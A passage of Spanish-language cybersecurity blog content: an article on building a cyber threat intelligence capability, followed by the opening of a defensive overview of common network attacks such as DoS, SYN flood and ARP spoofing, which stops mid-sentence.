inteligencia, la cantidad de productos disminuye drásticamente, mientras que el valor de esos productos aumenta exponencialmente. Podemos ver esto del paper publicado por el Departamento de Defensa de EE. UU. "Joint Publication 2-0: Joint Intelligence". [Imagen: Relación de datos información e inteligencia] ## Debordamiento de datos de ciberinteligencia En muchos casos, acceder a los datos de los feeds de amenazas se considera como el interruptor "encendido" para una capacidad de inteligencia de amenazas. Debido a que estas herramientas a menudo son de código abierto y se ocupan de indicadores técnicos, con frecuencia se promocionan como un buen punto de partida para desarrollar una estrategia. ¿Pero qué haces con tal volumen de datos? Ingerirlo en una solución SIEM (Sistema de información de seguridad y gestión de eventos) parece ser la respuesta más obvia, pero el riesgo que corremos con este enfoque, es que terminemos con cantidades cada vez mayores de datos que no se pueden procesar y terminen en "inteligencia". Cuando esto sucede, el resultado casi siempre es conocido como "fatiga de alertas". ## Evitando el bombo La ciberinteligencia de amenazas es un área relativamente nueva de seguridad de la información, y quienes tienen los servicios y la tecnología necesaria, deben ser los interesados en asegurarse de que las organizaciones comprenden los beneficios que verán con este tipo de capacidades. Pero al igual que con cualquier tecnología emergente, la exageración de vez en cuando supera la realidad, debemos realizar una buena gestión de espectativas. En la encuesta mencionada anteriormente, el 43 por ciento de los encuestados espera que la ciberinteligencia de amenazas ofrezca "una alerta temprana de nuevas amenazas y tácticas". Si bien una capacidad de inteligencia de amenazas madura y efectiva debería apuntar a entregarla finalmente, hay muchos otros beneficios de la ciberinteligencia de amenazas que se pueden lograr de manera más realista en un corto plazo de tiempo. Las empresas deben ser pragmáticas a la hora de definir cómo se puede aplicar la ciberinteligencia de amenazas como parte de toda su estrategia de seguridad de la información y considerar qué fases se alinearán con sus riesgos más acuciantes, así como con los recursos disponibles y la tecnología existente de ciberseguridad. Como vemos en Gartner, en "La arquitectura de seguridad adaptable: 12 capacidades críticas de seguridad" esto es un estado contínuo y cíclico: [Imagen: La arquitectura de seguridad adaptable] Podemos ver este espíritu en la Arquitectura de Seguridad Adaptativa propuesta por Gartner. El diagrama anterior detalla las funciones operativas de seguridad de la información, y sus roles en la reducción del riesgo de ataques entrantes. Pero, por supuesto, estos son solo efectivos cuando se aumentan con los resultados de la monitorización y el análisis continuos. Históricamente, se puede considerar esta monitorización y análisis a partir de datos de registro internos, pero la inteligencia de amenazas moderna tiene un papel importante que desempeñar al traer contexto a todo el ciclo de vida de la seguridad de la información mostrados. ## Fuentes de información sobre amenazas Como hay una cantidad de datos exponencialmente mayor que nunca, también hay muchas más oportunidades para obtener inteligencia de ella. Pero, con tantas fuentes y tantos datos, esto es difícil de hacer manualmente. No solo se tiene que recopilar estos datos de las fuentes correctas, lo que puede requerir una gran cantidad de esfuerzo para identificarlas, también se debe contar con los recursos y la experiencia necesaria para analizarlos. Muchas veces, el término "ciberinteligencia de amenazas" se usa para describir las fuentes de todos estos datos, pero en realidad son simplemente orígenes de datos que deben procesarse antes de que puedan considerarse inteligencia. Para ilustrar este punto, considere una gran pila de fotos de reconocimiento como las de la policia de las peliculas. Una vez que han sido revisados por un experto, analizados y utilizados para contar una historia, pueden considerarse inteligencia. ¿Pero hasta entonces? Es solo una gran pila de fotos de reconocimiento. Esta lista, que no es exhaustiva, define ampliamente las fuentes disponibles de datos de amenazas. Pero algo importante, debemos tener en cuenta, una vez más, que en esta etapa lo llamamos datos de amenazas, no ciberinteligencia de amenazas. - Datos técnicos (por ejemplo, listas de amenazas, spam, malware, infraestructura maliciosa) Este tipo de datos está disponible en grandes cantidades, a menudo de forma gratuita. Debido a su naturaleza binaria, es fácil integrarlo con las tecnologías de seguridad existentes, aunque se necesitará una gran cantidad de análisis adicionales para obtener un contexto real. Estas fuentes presentan una alta probabilidad de falsos positivos, y los resultados son frecuentemente desactualizados. - Datos en médios (por ejemplo, noticias, sitios de seguridad de la información, investigación de proveedores, blogs, descripciones de vulnerabilidades, pastebins) Estas fuentes a menudo proporcionan indicadores útiles de amenazas nuevas y emergentes, pero será difícil conectarlas con indicadores técnicos relevantes para medir el riesgo genuino de cada una de ellas por si misma. - Medios de comunicación social Sin lugar a dudas, hay una gran cantidad de datos potencialmente útiles en los canales de redes sociales, pero es difícil determinar los falsos positivos y la información errónea. Por lo general, encontraremos muchas referencias a las mismas amenazas y tácticas, que pueden representar una pesada carga para los analistas de seguridad. - Foros Debido a que estos canales están específicamente diseñados para albergar discusiones relevantes, son una fuente potencialmente valiosa de información sobre amenazas. Dicho esto, se debe dedicar tiempo a la recopilación y el análisis para identificar lo que es verdaderamente valioso de los mismos. - DarkWeb (múltiples niveles de comunidades subterráneas) A menudo es la fuente de información muy específica sobre amenazas tácticas y técnicas, pero es increíblemente difícil de acceder, especialmente para las comunidades criminales de nivel superior. Además, como muchas de estas comunidades no hablan inglés, el idioma suele ser un desafío. Por supuesto, si nuestro objetivo es desarrollar una imagen completa del "paisaje de amenazas", la única ruta es combinar referencias de varias fuentes de inteligencia. Pero como ya hemos mencionado, muchas de las fuentes anteriores presentan habitualmente barreras idiomáticas, lo que puede ser un obstáculo significativo para el análisis efectivo. Afortunadamente, los avances en el aprendizaje automático y el procesamiento del lenguaje natural (PLN) significan que con la tecnología adecuada, las referencias a las amenazas se pueden convertir en lenguaje neutral y, por lo tanto, analizadas por humanos o máquinas independientemente del idioma original utilizado. Tal vez sea aún más sorprendente que hayamos llegado a un punto en el que las soluciones de inteligencia que incorporan componentes de inteligencia artificial (AI) hayan aprendido con éxito el lenguaje de las amenazas y puedan identificar con precisión los términos "maliciosos". Claramente, esta combinación de aprendizaje automático, PLN e IA plantea una gran oportunidad para las organizaciones que buscan incorporar ciberinteligencia de amenazas. La reducción de la carga de trabajo de los analistas y la eliminación de barreras idiomáticas en particular son enormemente beneficiosos, y cuando se combinan con la capacidad de considerar múltiples fuentes de información y datos simultáneamente para producir inteligencia de amenaza genuina, es mucho más fácil construir un mapa comprensible del paisaje de amenazas. ## La ley de equilibrio de ciberinteligencia de amenazas: tiempo vs contexto Como con cada aspecto de la seguridad, el desafío es encontrar el equilibrio. Al considerar cómo acceder y aplicar la ciberinteligencia de amenazas, nuestras dos preocupaciones principales serán el tiempo y el contexto. El tiempo para descubrir un incidente de seguridad se examinó con cierto detalle en el Informe de violación de datos de Verizon del año pasado, que destacó que el descubrimiento rápido de un ataque reducirá sustancialmente el riesgo de una eventual violación de los datos. Si actualmente no disponemos de acceso a ciberinteligencia de amenazas, dependeremos por completo de las soluciones de seguridad para identificar amenazas y proteger nuetsra organización. Por el contrario, si confíamos en una lista de datos de amenazas, es posible que podamos tomar una decisión rápida si aparece una de nuestras direcciones IP o alguno de nuestros dominios, pero no tendremos contexto. En estas circunstancias, no podemos saber si estamos viendo datos falsos positivos o viejos e inexactos. Es en este punto del proceso que el tiempo se convierte en un factor clave. Para encontrar en el contexto que necesitamos, deberemos explorar las fuentes disponibles para buscar referencias relevantes y oportunas que confirmen que la infraestructura es maliciosa. Y a lo largo de este proceso, tendremos que lidiar con múltiples herramientas, numerosas fuentes y encontrar diferentes terminologías en diferentes idiomas. Como era de esperar, este proceso puede requerir mucho tiempo, y cuanto más demora, más crece nuestra ventana de riesgo. La "fatiga de alerta" también es un factor en esta parte, ya que las estaciones de operaciones de seguridad están obligadas a lidiar con una montaña de alertas en constante aumento. Una encuesta de Cloud Security Alliance destacó que el 40 por ciento de los analistas no tienen la inteligencia necesaria para investigar las alertas, y más de un tercio regularmente ignoran las alertas debido a la cantidad de falsos positivos que las mismas generan. ## Las mejores prácticas para utilizar la ciberinteligencia de amenazas Es de naturaleza humana suponer que más de algo siempre es mejor que menos. Pero como ya hemos visto, la enorme cantidad de puntos de datos proporcionados por la alimentación de amenaza típica a menudo puede conducir a nada más que "fatiga de alertas". Es una pena que tantas organizaciones vean amenazas puras como su mejor oportunidad para "comenzar" con la ciberinteligencia de amenazas. Por supuesto, la realidad es que si su objetivo es producir una inteligencia de amenazas contextualizada y valiosa, en el proceso es necesario obtener cantidades masivas de datos entrantes de diversas fuentes. Pero, y esto es vital, no hay necesidad de que los analistas humanos las vean nunca. En mi opinión, en lugar de simplemente recopilar flujos masivos de datos de amenazas, una implementación exitosa de la inteligencia de amenazas debería proporcionar a los analistas solo la inteligencia que necesitan para tomar decisiones de seguridad proactivas y reactivas. Al definir una estrategia para implementar la inteligencia de amenazas, es mucho mejor no comenzar investigando qué tecnologías o proveedores están disponibles. Como ya hemos destacado, existen decenas de fuentes de datos de amenazas, así como muchos proveedores de inteligencia y amenazas. En cambio, deberemos considerar tres preguntas clave: 1. ¿Entiendes cual es tu mayor riesgo? 2. ¿En qué áreas de nuestra estrategia de seguridad de la información ya se ha invertido y se planea invertir más? 3. ¿Cómo impactarán los recursos humanos y la capacidad de cómo implementar cualquier estrategia? Al inicio del post, discutíamos la importancia de la ciberinteligencia de amenazas como la pieza central de una arquitectura de seguridad de la información adaptativa. Al responder a las preguntas anteriores, es mucho más fácil determinar qué áreas operativas pueden ser útiles para la inteligencia de amenazas y, a su vez, cómo se puede mejorar nuestro perfil de seguridad general. También es valioso considerar cómo nuestra implementación de la ciberinteligencia de amenazas tiene el potencial de resultar en una mayor eficiencia y un uso más efectivo de los recursos disponibles. [Imagen: ciclo-inteligencia-de-amenazas] Esta sería una ruta sugerida para implementar la inteligencia de amenazas, aunque, naturalmente, nuestro viaje dependerá en gran medida de cómo se hayan respondido las preguntas anteriores. Los ejemplos proporcionados no son exhaustivos, y hay una multitud de formas de hacer que la inteligencia de amenazas funcione en el contexto de la estrategia y arquitectura de seguridad individual de una organización. Pero si que es cierto que con ellos deberíamos obtener una fuerte indicación de dónde podemos obtener beneficios. ## Monitorización de amenazas A medida que comencemos a desarrollar nuestra capacidad de inteligencia de amenazas, es probable que no contemos con la experiencia relevante o los recursos de tiempo necesarios para respaldar el análisis proactivo de la ciberinteligencia de amenazas. Sin embargo, aún podmeos obtener ventajas significativas y comenzar a recopilar información de diferentes fuentes al monitorizar el contenido que sea relevante para nuestro negocio y responder como parte de nuestra estrategia de seguridad de la información. Los tipos de inteligencia que podemos descubrir con este enfoque incluyen: - Credentiales, datos y códigos corporativos filtrados. - Visibilidad de nuevas vulnerabilidades. - Amenazas que acentúan los nuevos riesgos potenciales. ### Ejemplo de monitorización de ciberinteligencia Como se destaca en investigaciones recientes en el Informe de investigaciones de violaciones de datos 2017 de Verizon, "el 81 por ciento de las infracciones relacionadas con el pirateo aprovecharon contraseñas robadas y / o débiles". La mayoría de los "kiddies de script", hacktivistas y ciberdelincuentes cargan enormes cachés de nombres de usuarios y contraseñas en webs tipo pastebin o la dark web, poniendolos a la venta en mercados ilegales. Estos vertederos suelen incluir direcciones de correo electrónico corporativas y contraseñas que se encuentran cuando los sitios web de terceros se explotan mediante la inyección de SQL u otras vulnerabilidades. En estos casos, las medidas de seguridad internas a menudo resultan ineficaces, ya que alrededor del 60% de los usuarios admiten reutilizar contraseñas para acceder a sitios web de terceros y otros recursos de TI, propagando así su contraseña corporativa. Y como son muchas las organizaciones que todavía no usan la autenticación de múltiples factores (MFA), estas exposiciones presentan un riesgo altamente significativo. Ejemplo de dataleak en Recorded future : [Imagen: Data Leak] Los riesgos del correo electrónico corporativo y la reutilización de contraseñas se ilustran claramente en este caso de marzo de 2017. Recorded Future se ha configurado para alertar cuando se ve un conjunto específico de dominios corporativos en conexión con credenciales filtradas. Podemos ver desde la carga hasta un sitio pegado en sitios como pastebin en el que parece como si varios sitios web de Brasil hubieran sido pirateados. La base de datos de los usuarios del sitio web se ha descartado, incluidas las direcciones de correo electrónico, las contraseñas hash y los nombres. [Imagen: User Password Data Leak Pastebin] En esta lista de más de 3000 credenciales, algunas pertenecen claramente a un gran número de usuarios corporativos de gran alcance, y estas credenciales filtradas abren una puerta para los atacantes que buscan apuntar a esa organización con spear phishing u otras formas de ingeniería social. La monitorización de fuentes externas para este tipo de inteligencia aumentará drásticamente su visibilidad, no solo en términos de descubrir credenciales filtradas, sino también posibles infracciones de datos y código corporativo. ## Integración de monitorización de amenazas Si se ha invertido significativamente en operaciones de seguridad y tecnologías de soporte, hay varias formas en las que podemos utilizar la inteligencia de amenazas externa para ayudar a combatir la "fatiga de alertas" dentro de nuestra organización. Esta inteligencia puede proporcionar una gran cantidad de contexto a los indicadores que se ven desde fuentes internas, que a su vez pueden traer importantes ventajas, incluyendo: - Catástrofes mucho más precisas sobre la materia de afección. - Inteligencia enriquecida en indicadores descubiertos. - Más contexto de fuentes de recursos que se alimentan de forma técnica. [Imagen: Integración de alertas ciberinteligencia de amenzas] ### Ejemplo de integración de ciberinteligencia Naturalmente, deseamos que la inteligencia de amenazas agregue un valor tangible y cuantificable a la seguridad de nuestra organización, y para ello nos esforzaremos en proporcionar beneficios mensurables a nuestros clientes o para nuestro propio beneficio. En algunos, la ciberinteligencia de amenzas ha ayudado a reducir la cantidad de tráfico malicioso que ingresa a ciertas redes en un 63 por ciento. En un entorno controlado, un analista de SOC experimentó aumentará hasta 10 veces su productividad en materia de prevención de seguridad después de disponer de médios para la ciberinteligencia de amenazas en tiempo real integrada con soluciones SIEM. ## Análisis de amenazas A medida que nuestra función de inteligencia de amenazas comience a madurar, no hay dudas de que buscará maneras de identificar proactivamente las amenazas emergentes, y examinará más de cerca las tendencias que presentan riesgos para nuestra industria, competidores, proveedores y cadena de suministro. Y con este nivel de capacidad de inteligencia contra amenazas, obtendremos el tipo de información que no solo descubrirá nuevas amenazas y riesgos, sino que también mostrará valor estratégico. Por ejemplo: - La inteligencia que informa nuestra estrategia de seguridad. - Descubriendo nuevas amenazas, métodos y planes. - Analizando las tendencias de tráfico relacionadas con nuestra industria. A lo largo del desarrollo de nuestras capacidad de inteligencia de amenazas, este debería ser nuestro objetivo. Después de todo, si bien es increíblemente valioso poder identificar el tráfico malicioso (por ejemplo) y responder de forma instantánea, el verdadero valor de la ciberinteligencia de amenazas solo puede realizarse si se tiene una visión más estratégica. Al inicio del post, veiamos que deberiamos hacernos tres preguntas: 1. ¿Entiendes el mayor riesgo de tu negocio? 2. ¿En qué áreas de nuestra estrategia de seguridad de la información ya se ha invertido o se planea invertir más? 3. ¿Cómo impactarán los recursos humanos y la capacidad de cómo implementar cualquier estrategia? Ahora, con el beneficio de la inteligencia de amenazas altamente contextualizada, podemos continuar considerando estas preguntas a medida que ampliamos el alcance de nuestras operaciones de seguridad. Naturalmente, con el tiempo, nuestras prioridades bien pueden cambiar, particularmente si la organización o industria está creciendo o cambiando. Pero con una poderosa capacidad de inteligencia de amenazas, estaremos en una posición única para adaptar nuestra estrategia de seguridad de la información y nuestras operaciones de acuerdo con las necesidades de la organización. ### Visibilidad de vulnerabilidades Muchas veces, las organizaciones adoptan un enfoque volumétrico de la seguridad, particularmente cuando se trata de abordar vulnerabilidades. Y, por supuesto, sin la ciberinteligencia de amenazas para informar sobre nuestra estrategia, solo tiene sentido priorizar las vulnerabilidades según la cantidad de sistemas susceptibles. Pero con un sólido programa de inteligencia de amenazas, que proporcione análisis de vulnerabilidades de una gran variedad de fuentes disponibles, podremos adoptar un enfoque mucho más estratégico y basado en los riesgos. En lugar de pintar por números, podemos consultar un rango de fuentes y recibir alertas sobre los indicadores específicos que aumentan el riesgo de que se explote un CVE. Pero dado que la revelación de vulnerabilidades y los informes son esporádicos (por decir), ¿cuáles son las fuentes correctas para recopilar esta inteligencia? El 75 por ciento de las vulnerabilidades divulgadas desde el comienzo de 2016 aparecen en sitios web y redes sociales un promedio de siete días antes de los canales de información primarios. Y a medida que aumentan las referencias a las vulnerabilidades divulgadas, también aumenta la probabilidad de explotación. La naturaleza de las fuentes también se convierte en un factor en estos términos. Un hilo en las referencias en foros criminales o comunidades dark web también contribuiran a una mayor puntuación de riesgo, a medida que los actores amenazantes comiencen a discutir y compartir métodos para explotar. El riesgo aumentará una vez más cuando los indicadores muestren que la vulnerabilidad forma parte de un Exploit kit. Un CVE se agregará a un escáner, lo que permitira a los actores de amenazas identificar fácilmente los sistemas vulnerables con antelación. Después de esto, se agregó el código de prueba de concepto (POC) a GitHub, lo que llevó rápidamente a que el exploit se discutiera activamente en foros criminales y comunidades dark web: [Imagen: amenaza de vulnerabilidad inteligencia de amenazas en foros] Claramente, tener este tipo de inteligencia hace que la tarea de priorizar las vulnerabilidades sea mucho más simple y más poderosa. Después de todo, no importa cuán pocos de sus activos puedan verse afectados, si un exploit está siendo activamente discutido en foros de dark web, y está siendo "armado" a un ritmo alarmante (como lo fue en este caso), debería saltarnos inmediatamente a la cima de su lista de prioridades de remediación de vulnerabilidades. Y este proceso no es exclusivo de la gestión de vulnerabilidades. Con una poderosa capacidad de ciberinteligencia de amenazas, este nivel de contenido se puede recopilar, analizar y usar constantemente para informar una estrategia de seguridad de la información basada en riesgos. Pudiendo identificar las amenazas más importantes para nuestra organización en cualquier momento y asignar los recursos necesarios en consecuencia. ## Haga un caso de negocios y mida el ROI en inteligencia de amenazas Si has llegado hasta este punto, es posible que esté convencido del valor que la ciberinteligencia de amenaza contextualizada puede aportar a nuestra organización. Desafortunadamente, convencer a otros tomadores de decisiones podría ser un desafío, particularmente cuando se trata de desarrollar una justificación comercial y medir el ROI de ciertos puntos de la seguridad. En nuestro ejemplo anterior de integrar la inteligencia de amenazas con la tecnología SIEM, las métricas hablan por sí solas: una clara ganancia en el uso efectivo del tiempo del analista y una reducción drástica en el impacto de la "fatiga de alertas" en las operaciones de seguridad. Cuando llega el momento de desarrollar nuestro propio caso de negocios, entonces, este elemento de inteligencia de amenaza casi se resuelve solo. No solo puede señalar un estudio imparcial que demuestre el valor de una poderosa instalación de inteligencia de amenazas, en última instancia, podemos utilizar las mismas métricas posteriores a la implementación para evidenciar las ganancias de eficiencia. Pero cuando se trata de monitorizar y análisis, el ROI puede ser más difícil de probar. Después de todo, a diferencia de la prueba SIEM, que se puede medir de una manera puramente cuantitativa, las mejoras en la supervisión y el análisis arrojan beneficios predominantemente cualitativos y dicifilmente medibles. En pocas palabras, el pensamiento claro desde el principio es lo que permite el desarrollo de una poderosa capacidad de inteligencia de amenazas. Y, en última instancia, si elefimos enfocarse predominantemente en métricas fáciles de rastrear o beneficios más esotéricos, dependerá por completo de los requisitos únicos de nuestra organización. Con ese fin, te sugiero encarecidamente que sigas estos dos pasos clave: 1. Conoce tus metas (y demuestra que puede cumplirlas). Cuanto más claro seas, las áreas que creen que la ciberinteligencia cambiará el perfil de seguridad, es más probable que tengamos éxito. No tengas miedo de ser muy específico desde el principio para garantizar que maximizas el valor en solo algunas áreas clave. 2. No busques un proveedor, encuentra un compañero. Para desarrollar la capacidad de inteligencia, estaremos controlando los nuevos objetivos cuando empezemos a alcanzar los objetivos establecidos inicialmente. Un proveedor de ciberinteligencia de amenazas que invierte en el éxito de sus trabajos y trabaja con nosotros para descubrir nuevos casos de uso potenciales, es de mucho mayor valor para nuestra organización que un proveedor que simplemente ve su organización como otro cheque de pago. ## Conclución El vídeo que acompañaba a este apartado ya no está disponible en YouTube. Como con la mayoría de las áreas de seguridad, la diferencia entre la inteligencia de amenaza buena y mala es un abismo enorme. En un mundo ideal, la capacidad de ciberinteligencia de amenazas proporcionaría consistentemente alertas relevantes y contextualizadas que informan directamente a las medidas de seguridad proactivas y reactivas. En el lado de la ip, el peor de los escenarios sería una plataforma que constantemente sature las operaciones de seguridad con alertas obsoletas, irrelevantes e inutilizables, lo que llevaría a un mal caso generando "fatiga de alertas". Aquí está la cosa. La mayoría de las organizaciones que buscan implementar la inteligencia de amenazas por primera vez creen que las amenazas son la manera de comenzar. Para ello, simplemente implementan una plataforma básica de inteligencia de amenazas (TIP - threat intelligence platform), agregan algunos feeds de fuente abierta y entran directamente en escena. Si está buscando entrar directamente en el escenario de pesadilla descrito anteriormente, eso es exactamente lo que debemos hacer. En pocas palabras, no hay una forma más rápida de convencer a sus operaciones de seguridad de que la inteligencia de amenazas es una pérdida de tiempo y recursos que obligarlos a usar nada más que feeds de amenazas de código abierto. Porque, como ya hemos explicado, sin el contexto, la inteligencia de amenaza es realmente solo información de amenazas, y las operaciones operativas no tienen tiempo para realizar "descuentos" manuales en miles de falsos positivos. Debemos aceptar que la inteligencia de amenaza no tiene que ser muy complicada. Si tenemos claros nuestros objetivos desde el principio y tomamos el tiempo de identificar las tecnologías y los proveedores correctos para ayudar a llegar, la realidad cotidiana de utilizar inteligencia contra amenazas puede ser extraordinariamente simple. Aceptemos que la ciberinteligencia de amenaza no tiene que ser muy complicada. Si tenemos claros los objetivos desde el principio y tomamos el tiempo de identificar las tecnologías y los proveedores correctos para ayudarnos a llegar a ellos, la realidad cotidiana de utilizar inteligencia contra amenazas puede ser extraordinariamente simple. Para lograr esto, cualquiera que sea nuestra implementación de inteligencia de amenazas, debemos cumplir con cuatro áreas clave: 1. Se integra y mejora las tecnologías existentes. 2. Explora las fuentes técnicas, pero también la web abierta y oscura, en busca de amenazas, convirtiendo alertas en formatos utilizables. 3. Proporciona alertas totalmente contextualizadas en tiempo real sin falsos positivos. 4. Mejora de forma constante la eficiencia y la eficacia de sus operaciones de seguridad. Muchas de las llamadas soluciones de ciberinteligencia contra amenazas ofrecen poco más que datos de amenazas disponibles gratuitamente, que como ya explicamos, probablemente dificultarán más las operaciones de seguridad de lo que ayudan. Por lo tanto, cuando se reúna con los proveedores para identificar la solución perfecta, asegúrese de desafiarlos en estos puntos y pídales que prueben cualquier afirmación que formulen con hechos concretos. Y lo más importante, tómese el tiempo para encontrar un proveedor que actuará como un verdadero socio en el viaje de inteligencia de amenazas. ¿quién mejor para ayudar a maximizar el valor de la capacidad de inteligencia de amenazas? , una vez maduros ya daremos el salto a crear nuestro propio laboratorio. > Para otro post, me guardo el ver cómo crear un laboratorio de inteligencia de amenazas --- # 25 Tipos de ataques informáticos y cómo prevenirlos URL: https://ciberseguridad.blog/25-tipos-de-ataques-informaticos-y-como-prevenirlos/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-01-20 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > Una pequeña lista de ataques informáticos y cómo prevenirlos. Podríamos decir que son los más conocidos o generalizadas. En este mundo de la seguridad, cambiante de forma diaria y constante es imposible definir un listado de tipos de ataques de forma realista, pero mediante esta base de datos de amenazas, veremos 25 del total, los cuales podríamos decir que son las más conocidos o generalizadas. Para mantener un cierto grado de seguridad, lo principal y primero es la necesitamos de entender cómo pueden atacarnos y en qué consisten dichas amenazas, con el fin de poder remediarlas de la mejor forma posible. Este listado nos sirve para comprender las definiciones de todos los ataques y síntomas asociados a ellos. La última década ha sido testigo del cambio de paradigma en el que los hackers buscan explotar vulnerabilidades dentro de las organizaciones y las infraestructuras naciones. Con el fin de contrarrestar, todos tenemos que cambiar nuestra perspectiva hacia la forma en que percibimos la seguridad, conocer cietos ataques y cómo podemos aprender de los mismos para estar lo mejor preparados posibles, ya que no es posible decir en seguridad “preparados” a secas. ## 1. Ataque DoS En un ataque de denegación de servicio (DoS), un atacante intenta evitar la legitimidad de que los usuarios accedan a información o al servicios. El tipo más común y obvio de ataque DoS ocurre cuando un atacante "inunda" una red con información. Cuando escribimos una URL de un sitio web en particular en nuetro navegador, estamos enviando una solicitud al servidor web del sitio para poder ver la página en concreto. El servidor solo puede procesar una cierta cantidad de solicitudes de una vez, por lo que si un atacante sobrecarga el servidor con solicitudes, no puede procesarse dicha solicitud. Esto es una "denegación de servicio" ya que no se puede acceder al sitio. [Vídeo](https://www.youtube.com/watch?v=DUNRnuPHtYM) ### Síntomas DDoS - Rendimiento de la red inusualmente lento (abrir archivos o acceder a sitios web) - Indisponibilidad de un sitio web en particular - Incapacidad para acceder a cualquier sitio web - Aumento dramático en la cantidad de spam que recibimos ### Tipos de ataques DoS: 1. ICMP Flood Attack 2. Tear Drop Attack - Una serie de paquetes de datos se envían a la computadora destino con superposición de valores de campo y cargas útiles de gran tamaño. Como resultado, el objetivo no puede volver a ensamblar estos paquetes y se fuerza a que se bloquee o incluso a reiniciar. 1. Smurf Attack - El atacante envía una gran cantidad de solicitudes de eco ICMP a la dirección IP Broadcast. Estas solicitudes ICMP tienen una dirección de origen falsificada de la víctima. Por ello, si el dispositivo de enrutamiento entrega tráfico a esas direcciones de difusión, entrega la transmisión IP a todos los hosts, la mayoría de las direcciones IP envían un Mensaje de respuesta ECHO. Sin embargo, en una red de difusión de acceso múltiple, cientos de computadoras podría responder a cada paquete cuando la red objetivo se vea abrumada por todos los mensajes enviados simultáneamente. La red no podrá funcionar con normalidad. 1. SYN Flood - La inundación SYN envía una inundación de paquetes TCP / SYN, a menudo con un remitente falsificado en dirección. Cada uno de estos paquetes se maneja como una solicitud de conexión, causando al servidor una conexión semiabierta, mediante el envío de un paquete TCP / SYN-ACK , y esperando un paquete en respuesta de la dirección del remitente. Sin embargo, como la dirección del remitente está falsificada, la respuesta nunca llega. Estos halfopen en conexiones, saturan la cantidad de conexiones disponibles que el servidor puede hacer, evitando que responda a solicitudes legítimas hasta después de qu el ataque termine. 1. Land Attack - El atacante envía un paquete TCP SYN falsificado en el que la dirección IP de el objetivo se completa en los campos de origen y destino. Al recibir el paquete falsificado, el objetivo se confunde y se bloquea.Estos tipos de ataques son detectados por Anti-virus. 1. Jolt Dos Attack - Un atacante fragmenta el paquete ICMP de tal manera que el objetivo no puede volver a armarlo, como consecuencia, el uso de la CPU aumenta y se crean cuellos de botella y estrechamientos. 1. Fraggle Dos Attack - El atacante envía una gran cantidad de tráfico de solicitudes de eco UDP a una dirección IP de Difusión. Estos paquetes UDP tienen una dirección fuente falsificada de la víctima prevista. Por ello, si el dispositivo de enrutamiento entrega tráfico a esas direcciones, entrega la transmisión IP a todos los hosts, donde la mayoría de las direcciones IP envian un mensaje de respuesta ECHO. Sin embargo, en una red de difusión de acceso múltiple, cientos de computadoras pueden responder a cada paquete cuando la red objetivo es abrumada por todos los mensajes enviados simultáneamente, y la red será incapaz de trabajar con normalidad ## 2. Ping Flood Ping flood se basa en enviar a la víctima una cantidad abrumadora de paquetes ping, usualmente usando el comando "ping" de UNIX como hosts (el indicador -t en los sistemas Windows tiene una función mucho menos maligna). Es muy simple de lanzar, el requisito principal es tener acceso a un ancho de banda mayor que la víctima. ## 3. Ping de la muerte El atacante envía un paquete ICMP de más de 65.536 bytes. Como el sistema operativo no sabe cómo manejar un paquete tan grande, se congela o se cuelga en el momento de volver a montarlo. Hoy en día, el sistema operativo descarta dichos paquetes por sí mismo. Pero debía enumerar dicho ataque mítico (Otros muchos de esta lista estan obsoletos, pero debían ser enumerados) - Distributed Denial of Service (DDos): En un ataque distribuido de denegación de servicio (DDoS), un atacante puede usar su computadora para atacar a otra computadora. Al aprovechar las vulnerabilidades o debilidades de seguridad, un atacante podría tomar el control del PC / Servidor. Él o ella podría obligar al PC a enviar grandes cantidades de datos a un sitio web o enviar correo no deseado a direcciones de correo electrónico particulares. El ataque se "distribuye" porque el atacante está utilizando varios PCs, incluida la suya, para lanzar el ataque de denegación de servicio. Actualmente dichos ataques son lanzados desde las Botnet ### ¿Cómo prevenir ataques DDoS? 1. Aplicación de filtrado de enrutador 2. Bloquear direcciones IP sin usar 3. Permitir el acceso a la red solo al tráfico deseado 4. Deshabilitar servicios de red innecesarios 5. Actualización de antivirus regularmente 6. Tener una muy buena política de contraseñas 7. Limitar la cantidad de ancho de banda de la red 8. Uso de la red de filtrado de acceso ## 4. Escaneo de puertos El escaneo de puertos es una de las técnicas de reconocimiento más populares que utilizan los atacantes para descubrir los servicios expuestos a posibles ataques. Todas las máquinas conectadas a una red de área local (LAN) o Internet ejecutan muchos servicios que escuchan en puertos conocidos y no tan conocidos. Un escaneo de puertos ayuda al atacante a encontrar qué puertos están disponibles (es decir, qué servicio podría estar enumerando un puerto). Esencialmente, un escaneo de puertos consiste en enviar un mensaje a cada puerto, uno a uno. El tipo de respuesta recibida indica si el puerto está a la escucha y, por lo tanto, puede probarse más detalladamente para detectar debilidad. - Puertos conocidos (0 - 1023) - Puertos registrados (1024 - 49151) - Puertos dinámicos y / o privados (49152 - 65535) ## 5. ARP Spoofing ARP Poison Routing (APR), es una técnica utilizada para atacar una red cableada o inalámbrica de Ethernet. ARP Spoofing puede permitir que un atacante detecte frameworks de datos en una red de área local (LAN), modifique el tráfico o detenga el tráfico por completo. El ataque solo se puede usar en redes que realmente usan ARP y no en otro método de resolución de direcciones. La detección la realizamos mediante ARP inverso (RARP) que es un protocolo utilizado para consultar la dirección IP asociada con una dirección MAC dada. Si se devuelve más de una dirección IP, la clonación MAC está presente. ### Tipos de ataques ARP Spoofing: 1. Ataque de inundación MAC: - En un ataque típico de inundación MAC, un switch se inunda con paquetes, cada uno con diferentes direcciones MAC de origen. La intención es consumir la memoria limitada reservada en el switch para almacenar la tabla de traducción de puerto a físico de MAC. El resultado de este ataque hace que el switch ingrese a un estado llamado modo de apertura fallida, en el cual todos los paquetes entrantes se emiten en todos los puertos (como con un concentrador), en lugar de simplemente hacia abajo del puerto correcto según la operación normal. Un usuario malintencionado podría utilizar un analizador de paquetes (como Wireshark) ejecutándose en modo promiscuo para capturar datos confidenciales de otras computadoras (como contraseñas no encriptadas, correo electrónico y conversaciones de mensajería instantánea), que no serían accesibles si el interruptor funcionara con normalidad. 1. Envenenamiento de caché DNS: - Esta es una situación creada o no intencionalmente creada que proporciona datos a un servidor de nombres de almacenamiento en caché que no se originó en fuentes autorizadas del Sistema de nombres de dominio (DNS). Esto puede suceder a través del diseño incorrecto del software, la mala configuración de los servidores de nombres y los escenarios diseñados maliciosamente que explotan la arquitectura radicionalmente abierta del sistema DNS. Una vez que un servidor DNS ha recibido datos no auténticos y los almacena en caché para aumentar el rendimiento en el futuro, se considera envenenado, proporcionando los datos no auténticos a los clientes del servidor. 1. IP Spoofing: - La suplantación de IP se refiere a la creación de paquetes de Protocolo de Internet (IP) con un forjado de dirección IP de origen, llamada suplantación de identidad, con el propósito de 